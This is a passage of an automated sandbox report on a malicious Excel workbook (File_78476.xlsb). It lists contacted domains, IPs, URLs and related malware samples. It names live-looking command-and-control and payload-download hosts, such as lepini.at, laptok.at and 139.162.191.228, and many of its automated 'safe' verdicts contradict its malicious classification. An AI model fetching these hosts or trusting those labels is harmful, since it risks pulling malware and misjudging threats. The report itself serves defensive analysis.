http://api10.laptok.at/api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0dYaBh2VTFZ3ie/AQvPNAeKAbUpEx_2BIA_2F/yqBcCuGKcxWU4/7_2FDUSL/tmEKyuvK3UnsOb7GxJhyB1v/eAgP5jhU7c/4LQdBuTq0iBob66eg/RKZ75u7U2Jkq/Bh_2B1mS8Vw/lDNXKg1S3Gc5QV/zwawyAQoh3ycAGCJJd6YY/crMtievOTWbq6IjA/LAnATbCyag_2Bwn/5yU0_2BoSAkzUKbcl_/2BAXWx8K4/WLBZv2PnGv5crOgJCyib/ZVr6kC0SezCKLbzs2jt/2ZOSFMw	0%	Avira URL Cloud	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
http://api3.lepini.at/api1/TsKcWE2WM/nJKmvtwztxYIvooVmlF8/f0GhZMHg0Zw5qyafREH/k8WCOuLk57UyBPUazjQh2Z/3S3ubdSMDgVaL/gAWRJwIA/ZCG7BHExQwWXeVA1UnuSBqn/i4n1PFTtlL/cwWi1gc5A_2Bt5DHa/KB0_2BLRegs0/BViXJpKwWgb/pjm_2BuXWxLo81/vWKBV9Fs7FvCc1nuX8q5n/wGeJRl_2FEvkYbfF/Pr91DmkaDab5rrv/0H_2FXSeTsgpPadA5E/E3CpLlb73/0qgYAbyOZODf4FqqEkA4/X5b8p4TRxQsXlnMDNwZ/TvAO43omBsbN/h	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
http://api3.lepini.at/api1/wg1QV_2B2jK6U599/4soNRq1qJ06YALs/mJi2qRbZeuNMqY4FmA/01g6652pA/D2qVqwQIRUQev6KQGCi0/LYk3CvZ2IO_2Fu9jE12/_2B2kWk8qqoKgVqzIAtHsw/z75DAZtdqon2W/3Wolp6WN/H18LH8kaewpIZWiAXdUEHcF/0Ba_2F_2B2/ICV_2BIs_2FSaSDFn/9h5nv6RAHtg8/YqIkefpDil_/2BfZRGXy7VacIh/PFUk101XGoG2wc6VBSKno/YiX6cbeIPwJJih34/1jOElbpygTipEn_/2FzdBQOzx3LF3SdNfA/TQU2svioerNtuqc/vE_2Foj	0%	Avira URL Cloud	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
http://api3.lepini.at/api1/pmT_2FJ7yMpV_2FsxCGV/80ZJDlvhk5QH3DonF9p/gMZiDS0z2g2bNrJ_2Bv_2B/DXZEEWDxEnN_2/Bx7WHkRW/wpcaGRddIyctm9GWW0oCdyR/qDXQAt7J40/6ogNDJFenwl5gVncd/SbRM7SEjzx1B/lGa_2BU69FH/bDmPVUZABXfNqj/99lThSa0HHLaHhjsVvXGB/uCBX4Mj6I29IAbCC/UnujtjeNBz5OBuo/7XOr98uUHKNs6Ghu4C/k_2BIsFhF/UXse0hUo2oKU8zO8khsV/ZbPtcIIUg_2B2PD2b0Q/KHYH7l2X48hEAXFhsSFudS/huoP4e	0%	Avira URL Cloud	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
http://api10.laptok.at/api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0	0%	Avira URL Cloud	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
http://api10.laptok.at/favicon.ico	0%	Avira URL Cloud	safe
http://139.162.191.228/campo/m/m	0%	Avira URL Cloud	safe
http://139.162.191.228/campo/m/m.D	0%	Avira URL Cloud	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cabogrupo.co.mz	162.241.169.26	true	false	0%, Virustotal, Browse	unknown
c56.lepini.at	35.228.31.40	true	true	8%, Virustotal, Browse	unknown
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	35.228.31.40	true	false	11%, Virustotal, Browse	unknown
api10.laptok.at	35.228.31.40	true	false	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/NHDZE5NC0p4/EA1Rau0QpdKGS3/WTlj_2B7vKVxuNa_2F_2B/LYVSumGe5smX_2BD/OTX07ZqQ_2BIY5i/gaJx2nrBRbCwokKD6i/TmP3yOyRd/UIWhx47302AAtFE31oP0/QH6kOp10Kt5yvTIaAYa/LK0GUog4M1OCTVMD4H5Cd4/y7Hidc3RQ475o/Nxk1_2FU/AOpYSuCaFqv8yJoz1d98uE0/RGNbcUJDfT/THwRpNZtVSPwcxLQu/JgOmTTbGBEY6/RAYX3HI935J/bkHevlKXRebACN/zYCEHnvaIKYWA35nI5OI7/Zng6uRiwb/9FNesaJS	false	Avira URL Cloud: safe	unknown
http://api10.laptok.at/api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0dYaBh2VTFZ3ie/AQvPNAeKAbUpEx_2BIA_2F/yqBcCuGKcxWU4/7_2FDUSL/tmEKyuvK3UnsOb7GxJhyB1v/eAgP5jhU7c/4LQdBuTq0iBob66eg/RKZ75u7U2Jkq/Bh_2B1mS8Vw/lDNXKg1S3Gc5QV/zwawyAQoh3ycAGCJJd6YY/crMtievOTWbq6IjA/LAnATbCyag_2Bwn/5yU0_2BoSAkzUKbcl_/2BAXWx8K4/WLBZv2PnGv5crOgJCyib/ZVr6kC0SezCKLbzs2jt/2ZOSFMw	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/TsKcWE2WM/nJKmvtwztxYIvooVmlF8/f0GhZMHg0Zw5qyafREH/k8WCOuLk57UyBPUazjQh2Z/3S3ubdSMDgVaL/gAWRJwIA/ZCG7BHExQwWXeVA1UnuSBqn/i4n1PFTtlL/cwWi1gc5A_2Bt5DHa/KB0_2BLRegs0/BViXJpKwWgb/pjm_2BuXWxLo81/vWKBV9Fs7FvCc1nuX8q5n/wGeJRl_2FEvkYbfF/Pr91DmkaDab5rrv/0H_2FXSeTsgpPadA5E/E3CpLlb73/0qgYAbyOZODf4FqqEkA4/X5b8p4TRxQsXlnMDNwZ/TvAO43omBsbN/h	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/wg1QV_2B2jK6U599/4soNRq1qJ06YALs/mJi2qRbZeuNMqY4FmA/01g6652pA/D2qVqwQIRUQev6KQGCi0/LYk3CvZ2IO_2Fu9jE12/_2B2kWk8qqoKgVqzIAtHsw/z75DAZtdqon2W/3Wolp6WN/H18LH8kaewpIZWiAXdUEHcF/0Ba_2F_2B2/ICV_2BIs_2FSaSDFn/9h5nv6RAHtg8/YqIkefpDil_/2BfZRGXy7VacIh/PFUk101XGoG2wc6VBSKno/YiX6cbeIPwJJih34/1jOElbpygTipEn_/2FzdBQOzx3LF3SdNfA/TQU2svioerNtuqc/vE_2Foj	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/pmT_2FJ7yMpV_2FsxCGV/80ZJDlvhk5QH3DonF9p/gMZiDS0z2g2bNrJ_2Bv_2B/DXZEEWDxEnN_2/Bx7WHkRW/wpcaGRddIyctm9GWW0oCdyR/qDXQAt7J40/6ogNDJFenwl5gVncd/SbRM7SEjzx1B/lGa_2BU69FH/bDmPVUZABXfNqj/99lThSa0HHLaHhjsVvXGB/uCBX4Mj6I29IAbCC/UnujtjeNBz5OBuo/7XOr98uUHKNs6Ghu4C/k_2BIsFhF/UXse0hUo2oKU8zO8khsV/ZbPtcIIUg_2B2PD2b0Q/KHYH7l2X48hEAXFhsSFudS/huoP4e	false	Avira URL Cloud: safe	unknown
http://api10.laptok.at/favicon.ico	false	Avira URL Cloud: safe	unknown
http://139.162.191.228/campo/m/m	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://login.microsoftonline.com/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://shell.suite.office.com:1443	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://autodiscover-s.outlook.com/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://cdn.entity.	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://wus2-000.contentsync.	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://powerlift.acompli.net	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://cortana.ai	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://api.aadrm.com/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://api.microsoftstream.com/api/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://cr.office.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://ecs.office.com/config/v2/Office	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://graph.ppe.windows.net	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://officeci.azurewebsites.net/api/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://store.office.cn/addinstemplate	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wus2-000.pagecontentsync.	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://globaldisco.crm.dynamics.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://store.officeppe.com/addinstemplate	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://web.microsoftstream.com/video/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://graph.windows.net	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://dataservice.o365filtering.com/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
http://weather.service.msn.com/data.aspx	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://apis.live.net/v5.0/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
http://api10.laptok.at/api1/zobiFDQnBaZYuwt/rfdusQHNImkOYENAMp/kT_2B2cd3/SGUJBC0FLMtXFEIZjgF4/X6JHa0	{7B42C277-6DA5-11EB-90E4-ECF4BB862DED}.dat.22.dr	false	Avira URL Cloud: safe	unknown
https://management.azure.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://incidents.diagnostics.office.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://api.office.net	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://incidents.diagnosticssdf.office.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://entitlement.diagnostics.office.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://outlook.office.com/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://templatelogging.office.com/client/log	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://outlook.office365.com/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://webshell.suite.office.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
http://139.162.191.228/campo/m/m.D	sheet9.bin	false	Avira URL Cloud: safe	unknown
https://management.azure.com/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://ncus-000.contentsync.	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows.net/common/oauth2/authorize	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://devnull.onenote.com	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://messaging.office.com/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://augloop.office.com/v2	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false		high
https://skyapi.live.net/Activity/	10C955FB-4BA9-49A9-ADB0-58D59856D9CE.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
35.228.31.40	unknown	United States	15169	GOOGLEUS	true
139.162.191.228	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	false
162.241.169.26	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	352546
Start date:	12.02.2021
Start time:	18:42:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	File_78476.xlsb
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.winXLSB@11/20@12/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsb Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 168.61.161.212, 40.88.32.150, 52.109.76.68, 52.109.12.22, 52.109.12.23, 52.109.8.24, 23.218.208.56, 13.107.4.50, 51.103.5.159, 51.11.168.160, 92.122.213.247, 92.122.213.194, 20.54.26.129, 51.104.139.180, 88.221.62.148, 152.199.19.161, 52.155.217.156 Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, wns.notify.trafficmanager.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, Edge-Prod-FRAr4a.env.au.au-msedge.net, ie9comview.vo.msecnd.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, ris.api.iris.microsoft.com, au.au-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, au.c-0001.c-msedge.net, europe.configsvc1.live.com.akadns.net, cs9.wpc.v0cdn.net Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
35.228.31.40	u8xtCk7fq8.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	2200.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	Attached_File_898318.xlsb	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
162.241.169.26	https://shell-lubricants.net/	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
resolver1.opendns.com	u8xtCk7fq8.dll	Get hash	malicious	Browse	208.67.222.222
	2200.dll	Get hash	malicious	Browse	208.67.222.222
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Get hash	malicious	Browse	208.67.222.222
	yytr.dll	Get hash	malicious	Browse	208.67.222.222
	xls.xls	Get hash	malicious	Browse	208.67.222.222
	Presentation_68192.xlsb	Get hash	malicious	Browse	208.67.222.222
	sup11_dump.dll	Get hash	malicious	Browse	208.67.222.222
	out.dll	Get hash	malicious	Browse	208.67.222.222
	crypt_3300.dll	Get hash	malicious	Browse	208.67.222.222
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	208.67.222.222
	6007d134e83fctar.dll	Get hash	malicious	Browse	208.67.222.222
	J5cB3wfXIZ.dll	Get hash	malicious	Browse	208.67.222.222
	6006bde674be5pdf.dll	Get hash	malicious	Browse	208.67.222.222
	mal.dll	Get hash	malicious	Browse	208.67.222.222
	fo.dll	Get hash	malicious	Browse	208.67.222.222
	5fd9d7ec9e7aetar.dll	Get hash	malicious	Browse	208.67.222.222
	5fd885c499439tar.dll	Get hash	malicious	Browse	208.67.222.222
	5fc612703f844.dll	Get hash	malicious	Browse	208.67.222.222
	https___purefile24.top_4352wedfoifom.dll	Get hash	malicious	Browse	208.67.222.222
	vnaSKDMnLG.dll	Get hash	malicious	Browse	208.67.222.222
c56.lepini.at	u8xtCk7fq8.dll	Get hash	malicious	Browse	35.228.31.40
	2200.dll	Get hash	malicious	Browse	35.228.31.40
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Get hash	malicious	Browse	35.228.31.40
	Presentation_68192.xlsb	Get hash	malicious	Browse	47.89.250.152
	sup11_dump.dll	Get hash	malicious	Browse	45.138.24.6
	out.dll	Get hash	malicious	Browse	45.138.24.6
	crypt_3300.dll	Get hash	malicious	Browse	45.138.24.6
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	45.138.24.6
	u.dll	Get hash	malicious	Browse	46.173.218.93
	fo.dll	Get hash	malicious	Browse	46.173.218.93
	onerous.tar.dll	Get hash	malicious	Browse	47.241.19.44
